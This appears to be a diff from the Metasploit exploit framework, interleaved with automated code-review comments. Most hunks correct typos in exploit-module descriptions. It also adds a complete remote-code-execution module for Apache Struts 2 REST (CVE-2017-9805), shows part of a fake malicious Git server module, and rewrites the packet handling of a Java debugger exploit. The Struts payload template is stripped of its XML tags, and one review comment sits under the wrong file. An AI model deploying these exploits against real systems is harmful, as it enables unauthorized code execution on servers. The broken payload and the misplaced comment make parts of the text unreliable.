+ end + + def primer + # add the git and mercurial URIs as necessary + hardcoded_uripath(git_uri) + print_status("Malicious Git URI is 
#{URI.parse(get_uri).merge(git_uri)}") + end + + # handles routing any request to the mock git, mercurial or simple HTML as necessary + def on_request_uri(cli, req) + # if the URI is one of our repositories and the user-agent is that of git/mercurial + # send back the appropriate data, otherwise just show the HTML version + user_agent = req.headers['User-Agent'] + if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) + do_git(cli, req) + return + end + + do_html(cli, req) + end + + # simulates a Git HTTP server + def do_git(cli, req) + # determine if the requested file is something we know how to serve from our + # fake repository and send it if so + req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') + if @repo_data[:git][:files].key?(req_file) + vprint_status("Sending Git #{req_file}") + send_response(cli, @repo_data[:git][:files][req_file]) + else + vprint_status("Git #{req_file} doesn't exist") + send_not_found(cli) + end + end + + # simulates an HTTP server with simple HTML content that lists the fake + # repositories available for cloning + def do_html(cli, _req) + resp = create_response + resp.body = < + Public Repositories + +

Here are our public repositories:

+
    +HTML + this_git_uri = URI.parse(get_uri).merge(git_uri) + resp.body << "
  • Git (clone with `git clone #{this_git_uri}`)
  • " + resp.body << < + + +HTML + + cli.send_response(resp) + end + + # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI + def git_uri + return @git_uri if @git_uri + if datastore['GIT_URI'].blank? + @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' + else + @git_uri = datastore['GIT_URI'] + end + end +end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index f46b3b7913..b6cecdbe60 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Sun/Oracle GlassFish Server Authenticated Code Execution", 'Description' => %q{ - This module logs in to an GlassFish Server (Open Source or Commercial) using various + This module logs in to a GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index b264121033..952b259ff6 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ ISPConfig allows an authenticated administrator to export language settings into a PHP script which is intended to be reuploaded later to restore language settings. This feature - can be abused to run aribtrary PHP code remotely on the ISPConfig server. + can be abused to run aribitrary PHP code remotely on the ISPConfig server. This module was tested against version 3.0.5.2. }, 
diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index 972fa6094a..3476298175 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'JBoss Seam 2 File Upload and Execute', 'Description' => %q{ - Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly + Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 02f4e74df2..cf434701df 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", 'Description' => %q{ Atlassian Hipchat is a web service for internal instant messaging. A plugin is available - for Jira that allows team collibration at real time. A message can be used to inject Java - code into a Velocity template, and gain code exeuction as Jira. Authentication is required + for Jira that allows team collaboration at real time. A message can be used to inject Java + code into a Velocity template, and gain code execution as Jira. Authentication is required to exploit this vulnerability, and you must make sure the account you're using isn't protected by captcha. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). 
diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index b5e1e5e8ad..7c2effef87 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read - from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. + from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index 43d06e0237..89dd9e9495 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this - module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been + module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been tested successfully in Windows and Linux on several versions. }, 'Author' => 
diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index 26729a49f4..bebc6eff52 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MediaWiki Thumb.php Remote Command Execution', 'Description' => %q{ MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, - when DjVu or PDF file upload support is enabled, allows remote unauthenticated + when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation. diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 18bedbd89f..daaebfc86b 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. This script may be invoked remotely without requiring authentication to any MT instance. 2. Through a crafted POST request, it is possible to invoke particular - database migration functions (i.e functions that bring the existing + database migration functions (i.e. functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters. 3. A particular migration function, core_drop_meta_for_table, allows diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 913e0227e3..4e1dfa9d03 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Nibbleblog File Upload Vulnerability', 'Description' => %q{ - Nibbleblog contains a flaw that allows a authenticated remote + Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. }, diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 2cf8fe4ae0..f02ae13f40 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'OpenMediaVault Cron Remote Command Execution', 'Description' => %q{ - OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system. + OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system. An attacker can abuse this to run arbitrary commands as any user available on the system (including root). }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 6e6579a61b..77614ef7c2 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. - The local path being accessable from an URL allows an attacker to perform the remote code + The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1. 
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb index 41e0dcbb03..c56f4c86fd 100644 --- a/modules/exploits/multi/http/phpmailer_arg_injection.rb +++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb @@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time - res = send_request_cgi( + res = send_request_cgi!( 'method' => 'GET', 'uri' => trigger_uri ) diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 9eb8631641..d8ea1aae0c 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php - does not properly handle the pfilez parameter, which will be used in a exec() + does not properly handle the pfilez parameter, which will be used in an exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability. diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 978eb6f6d4..0c4b3d8e38 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb 
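Review bot: The switch to `send_request_cgi!` changes the trigger request to follow redirects, and nothing in the hunk records why that is needed; a one-line comment above the call, e.g. `# send_request_cgi! follows redirects from the trigger URI (plain send_request_cgi stopped at the 3xx)`, would keep the intent next to the code. It is also worth confirming that the redirected response is the one the loop's later checks expect, since a redirect to another host or path may not carry the same body. The enclosing `while wait_time > 0` loop continues outside the hunk.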
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run - successfully while testing, shell payload have been used. + successfully while testing, shell payload has been used. }, 'Author' => [ diff --git a/modules/exploits/multi/http/struts2_content_type_ognl.rb b/modules/exploits/multi/http/struts2_content_type_ognl.rb index 91b89ffea4..1b4ba5e634 100644 --- a/modules/exploits/multi/http/struts2_content_type_ognl.rb +++ b/modules/exploits/multi/http/struts2_content_type_ognl.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', 'Description' => %q{ - This module exploits a remote code execution vunlerability in Apache Struts + This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. diff --git a/modules/exploits/multi/http/struts2_rest_xstream.rb b/modules/exploits/multi/http/struts2_rest_xstream.rb new file mode 100644 index 0000000000..d3308d6c75 --- /dev/null +++ b/modules/exploits/multi/http/struts2_rest_xstream.rb 
@@ -0,0 +1,194 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', + 'Description' => %q{ + Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, + using the REST plugin, are vulnerable to a Java deserialization attack + in the XStream library. + }, + 'Author' => [ + 'Man Yue Mo', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-9805'], + ['URL', 'https://struts.apache.org/docs/s2-052.html'], + ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], + ['URL', 'https://github.com/mbechler/marshalsec'] + ], + 'DisclosureDate' => 'Sep 5 2017', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'python', 'linux', 'win'], + 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => [ + ['Unix (In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + ], + ['Python (In-Memory)', + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON + ], +=begin this stuff that doesn't work yet + ['PowerShell (In-Memory)', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + ], +=end + ['Linux (Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64] + ], + ['Windows (Dropper)', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3']) + ]) + end + + def check + if execute_command(random_crap) + CheckCode::Appears + else + CheckCode::Safe + end + end + + def exploit + case target.name + when 
/Unix/, /Python/, /PowerShell/ + execute_command(payload.encoded) + else + execute_cmdstager + end + end + + # + # Exploit methods + # + + def execute_command(cmd, opts = {}) + cmd = case target.name + when /Unix/, /Linux/ + %W{/bin/sh -c #{cmd}} + when /Python/ + %W{python -c #{cmd}} + when /PowerShell/ + # This doesn't work yet + %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} + when /Windows/ + %W{cmd.exe /c #{cmd}} + end + + # Encode each command argument with XML entities + cmd.map! { |arg| arg.encode(xml: :text) } + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => target_uri.path, + 'ctype' => 'application/xml', + 'data' => xstream_payload(cmd) + ) + + check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect) + end + + # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO + def xstream_payload(cmd) + # XXX: and need to be removed for Windows + < + + + 0 + + + + + + false + 0 + + + + + + #{cmd.join('')} + + false + + + + + java.lang.ProcessBuilder + start + + + #{random_crap} + + #{random_crap} + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + +EOF + end + + # + # Utility methods + # + + def check_response(res) + res && res.code == 500 && res.body.include?(error_string) + end + + def error_string + 'java.lang.String cannot be cast to java.security.Provider$Service' + end + + def random_crap + Rex::Text.rand_text_alphanumeric(rand(42) + 1) + end + +end diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 555f82139e..edb0f2335c 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb 
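Review bot: `check` can never return `CheckCode::Safe`: `execute_command` ends in `check_response(res) || fail_with(...)`, and `fail_with` raises, so a non-vulnerable or unreachable target aborts the check with an exception instead of reporting a result. The least invasive repair keeps `execute_command` as the CmdStager callback needs it and has `check` rescue the failure, as below; an unreachable host (nil `res`) is then still reported as Safe rather than Unknown, which should be a deliberate choice rather than an accident. `check` also executes a command on the target (`random_crap` through `/bin/sh -c`), which deserves a comment above `def check` since operators usually expect a check to be passive. Separately, the `case target.name` in `execute_command` has no else branch, so an unmatched target name leaves `cmd` nil and `cmd.map!` raises NoMethodError, and the `opts` parameter, present for the CmdStager callback signature, is unused and could be named `_opts`.
```ruby
# NOTE: this check is not passive; it runs a throwaway command on the target
def check
  execute_command(random_crap) ? CheckCode::Appears : CheckCode::Safe
rescue Msf::Exploit::Failed
  CheckCode::Safe
end
```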
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated - file uploads and handles zip file contents in a insecure way. By combining both weaknesses, + file uploads and handles zip file contents in an insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version diff --git a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb index 110e7abc87..586b0ab0ef 100644 --- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb +++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this - module performs a heart beat request until the box is bounced and then attempts to login + module performs a heartbeat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance. }, diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 1ddcff8c88..3fd494853f 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. - Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it + Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands. }, diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 2731360ea0..b12508d8d0 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ vTiger CRM allows an authenticated user to upload files to embed within documents. Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP - script and execute aribtrary PHP code remotely. + script and execute arbitrary PHP code remotely. This module was tested against vTiger CRM v5.4.0 and v5.3.0. }, diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index 797a30facc..ed54ac1f02 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ - vTiger CRM allows an user to bypass authentication when requesting SOAP services. + vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 7328cdfb60..f794504e09 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before - saving it to disk, and then places this item in the web directory accessable by + saving it to disk, and then places this item in the web directory accessible by remote users. This flaw can be abused to gain remote code execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 12e5bd3132..56368c7074 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the - UserAgent header , and then request it to execute our payload. There are at least + UserAgent header, and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 14a05770fd..25dd0dd60d 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution', 'Description' => %q{ This module exploits a post-auth vulnerability found in X7 Chat versions - 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which + 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which uses preg_replace() function with the /e modifier. This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine. }, diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index ade24f8adb..de100b0b9a 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb 
@@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ ZABBIX allows an administrator to create scripts that will be run on hosts. An authenticated attacker can create a script containing a payload, then a host - with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host. + with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host. - This module was tested againt Zabbix v2.0.9. + This module was tested against Zabbix v2.0.9. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index 6832d348f4..e5918279e8 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Novell ZENworks Configuration Management Remote Execution', 'Description' => %q{ This module exploits a code execution flaw in Novell ZENworks Configuration - Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control + Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This module has been tested successfully on Novell diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 2eb186f7aa..b8f06786d9 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb 
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Zpanel Remote Unauthenticated RCE', 'Description' => %q{ This module exploits an information disclosure vulnerability - in Zpanel. The vulnerability is due to a vulnerable version + in ZPanel. The vulnerability is due to a vulnerable version of pChart used by ZPanel that allows unauthenticated users to read arbitrary files remotely on the file system. This particular module utilizes this vulnerability to identify the username/password diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index dbaefa9031..86881c09d3 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution', 'Description' => %q{ This module abuses the "RunScript" procedure provided by the SOAP interface of - Adobe InDesign Server, to execute abritary vbscript (Windows) or applescript(OSX). + Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX). The exploit drops the payload on the server and must be removed manually. }, diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 87f992ab1c..779dd93574 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
@@ -91,26 +91,19 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] ], - 'Platform' => %w{ linux win }, - 'Arch' => ARCH_X86, + 'Platform' => %w{ linux osx win }, + 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64], 'Payload' => { - 'Space' => 2048, + 'Space' => 10000000, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux' - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win' - } - ] + [ 'Linux (Native Payload)', { 'Platform' => 'linux' } ], + [ 'OSX (Native Payload)', { 'Platform' => 'osx' } ], + [ 'Windows (Native Payload)', { 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 
@@ -175,24 +168,18 @@ class MetasploitModule < Msf::Exploit::Remote if pkt_len < 4 fail_with(Failure::Unknown, "#{peer} - Received corrupted response") end - pkt_len = pkt_len - 4 - - response = sock.get_once(pkt_len, timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - while response.length < pkt_len - partial = sock.get_once(pkt_len, timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial - response << partial - end - - fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len - - id, flags, err_code = response.unpack('NCn') - response.slice!(0..6) + id, flags, err_code = sock.get_once(7, timeout).unpack('NCn') if err_code != 0 && flags == REPLY_PACKET_TYPE fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}") end + response = "" + while response.length + 11 < pkt_len + partial = sock.get_once(pkt_len, timeout) + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial + response << partial + end + fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len response end @@ -207,8 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote # Unpacks received string structure from the server response into a normal string def read_string(data) data_len = data.unpack('N')[0] - data.slice!(0..3) - return data.slice!(0,data_len) + return data[4,data_len] end # Creates a new string object in the target VM and returns its id @@ -252,10 +238,11 @@ class MetasploitModule < Msf::Exploit::Remote # Parses given data according to a set of formats def parse_entries(buf, formats, explicit=true) entries = [] + index = 0 if explicit nb_entries = buf.unpack('N')[0] - buf.slice!(0..3) + buf = buf[4..-1] else nb_entries = 1 end 
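Review bot: The 7-byte header read in read_reply now trusts `sock.get_once(7, timeout)` unconditionally: a timeout returns nil and a short read returns fewer bytes, so `.unpack('NCn')` either raises NoMethodError or yields a nil `err_code`, where the removed loop used to fail cleanly with TimeoutExpired. Guard it: `header = sock.get_once(7, timeout)` / `fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless header && header.length == 7` / `id, flags, err_code = header.unpack('NCn')`. The surviving `pkt_len < 4` check also predates the new layout, in which the header alone is 11 bytes, so `pkt_len < 11` is the bound the later `response.length + 11` arithmetic assumes. The body loop asks for `pkt_len` bytes per call although at most `pkt_len - 11 - response.length` remain, which may over-read into a following packet if the server has already sent one; worth confirming against the socket semantics. read_reply starts outside the hunk.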
